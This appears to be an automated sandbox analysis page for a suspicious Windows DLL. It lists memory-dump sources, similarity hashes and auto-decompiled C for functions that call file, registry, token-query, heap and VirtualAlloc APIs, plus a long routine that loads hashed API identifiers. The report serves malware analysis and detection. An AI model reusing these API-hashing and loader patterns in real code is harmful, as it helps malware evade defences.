Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 910ec13e874ed492f89d4cd603b0e85e47c230fddc630b960ee41e89019c79ec
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: FF01F73568030AFBE65067E54D44F7B7B4CDF816D8F008C35BA12551C5EE12AD66C121

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E8F5E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E8EC280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E8F3064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e8f5e14
0x6e8f5e15
0x6e8f5e17
0x6e8f5e1d
0x6e8f5e1f
0x6e8f5e23
0x6e8f5e23
0x6e8f5e27
0x6e8f5e33
0x6e8f5e67
0x6e8f5e67
0x00000000
0x6e8f5e35
0x6e8f5e3a
0x6e8f5e3b
0x6e8f5e4f
0x6e8f5e60
0x6e8f5e51
0x6e8f5e5c
0x6e8f5e5c
0x6e8f5e65
0x6e8f5e6d
0x6e8f5e6f
0x6e8f5e72
0x6e8f5e77
0x6e8f5e77
0x6e8f5e7b
0x6e8f5e80
0x00000000
0x00000000
0x00000000
0x6e8f5e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E8F5D48,?,?), ref: 6E8F5E5C

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 1da8c9b200e2968fdad46192ffeecc7a5674411de365612cd099c2399dd56b0a
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 69F04931A18F11FAD7515BBD9C60A8773E8DFD1BD0F108E29F540A6184F6609C428261

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F5E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8F5E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E8EC280(_t19) == 0) {
					_v12 = _a8;
					if(E6E8F3064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E8F35F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e8f5e87
0x6e8f5e89
0x6e8f5e95
0x6e8f5e9f
0x6e8f5eb5
0x6e8f5ed4
0x6e8f5eb7
0x6e8f5ec8
0x6e8f5ecc
0x6e8f5eec
0x6e8f5ece
0x6e8f5ece
0x6e8f5ece
0x6e8f5ecc
0x6e8f5ed5
0x6e8f5eda
0x6e8f5ee3
0x6e8f5edc
0x6e8f5edc
0x6e8f5ede
0x6e8f5ede
0x6e8f5e97
0x6e8f5e97
0x6e8f5e97
0x6e8f5ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E8F5D79,00000000,?,00000000,?), ref: 6E8F5EC8

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: 51e8cfe0dca01f2880e3e2a86f0b63b85b294d7d7a8a51d7902cd8d7802a0059
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 7CF03631258B07EFD751DBA99C20AAA77D9AF492D4F11CC2AA895C6180EA32DD06C621

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8F564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E8F3064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E8EE644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e8f5656
0x6e8f5658
0x6e8f565f
0x6e8f5661
0x6e8f5665
0x6e8f5667
0x6e8f566a
0x6e8f566d
0x6e8f566d
0x6e8f5687
0x00000000
0x00000000
0x6e8f5698
0x6e8f569c
0x00000000
0x00000000
0x6e8f56aa
0x6e8f56ad
0x6e8f56b2
0x6e8f56b7
0x6e8f56b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E8F5698

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 1570f64b05d5e0bd5bb104f8ce6326cc5258100c0664ff7e9073cfc91c6f0791
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 3EF0C8B510030AAFE7249F5ACC54DB7BBFDEBC1B50F00892DA0E542540EA35AC51C971

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E8F1030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E8F306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E8F306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e8f103e
0x6e8f1040
0x6e8f104e
0x6e8f1052
0x6e8f109b
0x00000000
0x6e8f109b
0x6e8f1057
0x6e8f1058
0x6e8f105a
0x6e8f105f
0x00000000
0x6e8f1078
0x6e8f107c
0x6e8f1089
0x6e8f108d
0x00000000
0x00000000
0x00000000
0x6e8f1096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E8F1089

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: b12c4af05cbcc72c1fa97c4f0aa1e943f306d920077b86bed36389870268ccbb
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: FBF04FB0244647EBEA40D5BC9C68F7F32AD5BC1694F908C28B540CA294EB78C94A8626

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E8F3628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e8fd228 == 0xa33c83e5) {
					_t7 = E6E8F3064(0x60a28c5c, 0x1c6ef387);
					 *0x6e8fd22c = E6E8F3064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e8fd228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e8fd228 = 0;
					}
				}
				_t3 = E6E8F3064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e8fd228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e8f3630
0x6e8f3638
0x6e8f366b
0x6e8f367c
0x6e8f3687
0x6e8f3692
0x6e8f3694
0x6e8f3694
0x6e8f3687
0x6e8f3644
0x6e8f364b
0x00000000
0x6e8f364d
0x6e8f364d
0x6e8f364e
0x6e8f3650
0x6e8f3652
0x6e8f3653
0x00000000
0x6e8f3653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E8EDE09,?,?), ref: 6E8F3692

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: c45a483be68319d60be6e395b260f571c86aeaffef0d206f2949e6e989c20458
Instruction ID: afd2dbb57403d0e18b8b5d5217f87c7d502f34be4f4ceaca03e512dea0ac0c13
Opcode Fuzzy Hash: c45a483be68319d60be6e395b260f571c86aeaffef0d206f2949e6e989c20458
Instruction Fuzzy Hash: B9F0E934156291FFEAA05AEAAC08D56A698EF956D6F000C39F284A5240D6B8CC42E677

Uniqueness

Uniqueness Score: -1.00%

Function 009E1000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 009E10FF

Memory Dump Source

Source File: 00000000.00000002.648952554.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: 6fe707c42fec977baf2f3059038f37e65704eae7e4c77f4acbb5d8e7fc6992c7
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: 4641F6B5E052198FDB04DFA9C4906AEBBF1FF88314F19856DE448AB341D379A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E8E1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E8E1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E8EF584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v76, E6E8EF4CC( &_v76) + 0x10);
				E6E8EF4BC( &_v80, E6E8EF4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v84, E6E8EF4CC(_t325) + 0x10);
				E6E8EF4BC( &_v88, E6E8EF4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v92, E6E8EF4CC(_t329) + 0x10);
				E6E8EF4BC( &_v96, E6E8EF4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v100, E6E8EF4CC(_t333) + 0x10);
				E6E8EF4BC( &_v104, E6E8EF4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v108, E6E8EF4CC(_t337) + 0x10);
				E6E8EF4BC( &_v112, E6E8EF4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v116, E6E8EF4CC(_t341) + 0x10);
				E6E8EF4BC( &_v120, E6E8EF4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v124, E6E8EF4CC(_t345) + 0x10);
				E6E8EF4BC( &_v128, E6E8EF4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v132, E6E8EF4CC(_t349) + 0x10);
				E6E8EF4BC( &_v136, E6E8EF4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v140, E6E8EF4CC(_t353) + 0x10);
				E6E8EF4BC( &_v144, E6E8EF4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v148, E6E8EF4CC(_t357) + 0x10);
				E6E8EF4BC( &_v152, E6E8EF4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v156, E6E8EF4CC(_t361) + 0x10);
				E6E8EF4BC( &_v160, E6E8EF4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v164, E6E8EF4CC(_t365) + 0x10);
				E6E8EF4BC( &_v168, E6E8EF4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v172, E6E8EF4CC(_t369) + 0x10);
				E6E8EF4BC( &_v176, E6E8EF4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v180, E6E8EF4CC(_t373) + 0x10);
				E6E8EF4BC( &_v184, E6E8EF4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v188, E6E8EF4CC(_t377) + 0x10);
				E6E8EF4BC( &_v192, E6E8EF4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v196, E6E8EF4CC(_t381) + 0x10);
				E6E8EF4BC( &_v200, E6E8EF4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v204, E6E8EF4CC(_t385) + 0x10);
				E6E8EF4BC( &_v208, E6E8EF4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E8F4200(0x60a28c5c, _t434);
				E6E8EF4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E8EF4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E8EF4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E8EF4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E8EF4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E8EF4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E8EF4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E8EF4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E8EF4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E8EF4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E8EF4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E8EF4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E8EF4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E8EF4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E8EF4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E8EF4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E8EF4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E8E1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E8EB27C( &_v248, _v256, _t481, _v252, _t318);
				E6E8EF840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v296, E6E8EF4CC(_t410) + 0x10);
				E6E8EF4BC( &_v300, E6E8EF4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v304, E6E8EF4CC(_t414) + 0x10);
				E6E8EF4BC( &_v308, E6E8EF4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v312, E6E8EF4CC(_t418) + 0x10);
				E6E8EF4BC( &_v316, E6E8EF4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E8EF828( &_v320, E6E8EF4CC(_t422) + 0x10);
				E6E8EF4BC( &_v324, E6E8EF4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E8EB9FC(_t154,  *_t480);
				E6E8EF4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E8EF4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E8EF4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E8EF4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E8EF654( &_v316);
				return E6E8EF654( &_v356);
			}

0x6e8e1494
0x6e8e1498
0x6e8e149d
0x6e8e14a3
0x6e8e14ab
0x6e8e14b0
0x6e8e14bc
0x6e8e14c0
0x6e8e14d2
0x6e8e14e8
0x6e8e14f3
0x6e8e14f4
0x6e8e14f5
0x6e8e14f6
0x6e8e14f7
0x6e8e14fa
0x6e8e14fe
0x6e8e1502
0x6e8e1509
0x6e8e151b
0x6e8e1531
0x6e8e153c
0x6e8e153d
0x6e8e153e
0x6e8e153f
0x6e8e1540
0x6e8e1543
0x6e8e1547
0x6e8e154b
0x6e8e1552
0x6e8e1564
0x6e8e157a
0x6e8e1585
0x6e8e1586
0x6e8e1587
0x6e8e1588
0x6e8e1589
0x6e8e158c
0x6e8e1590
0x6e8e1594
0x6e8e159b
0x6e8e15ad
0x6e8e15c3
0x6e8e15ce
0x6e8e15cf
0x6e8e15d0
0x6e8e15d1
0x6e8e15d2
0x6e8e15d5
0x6e8e15d9
0x6e8e15dd
0x6e8e15e4
0x6e8e15f6
0x6e8e160c
0x6e8e1617
0x6e8e1618
0x6e8e1619
0x6e8e161a
0x6e8e161b
0x6e8e161e
0x6e8e1622
0x6e8e1626
0x6e8e162d
0x6e8e163f
0x6e8e1655
0x6e8e1660
0x6e8e1661
0x6e8e1662
0x6e8e1663
0x6e8e1664
0x6e8e1667
0x6e8e166b
0x6e8e166f
0x6e8e1676
0x6e8e1688
0x6e8e169e
0x6e8e16a9
0x6e8e16aa
0x6e8e16ab
0x6e8e16ac
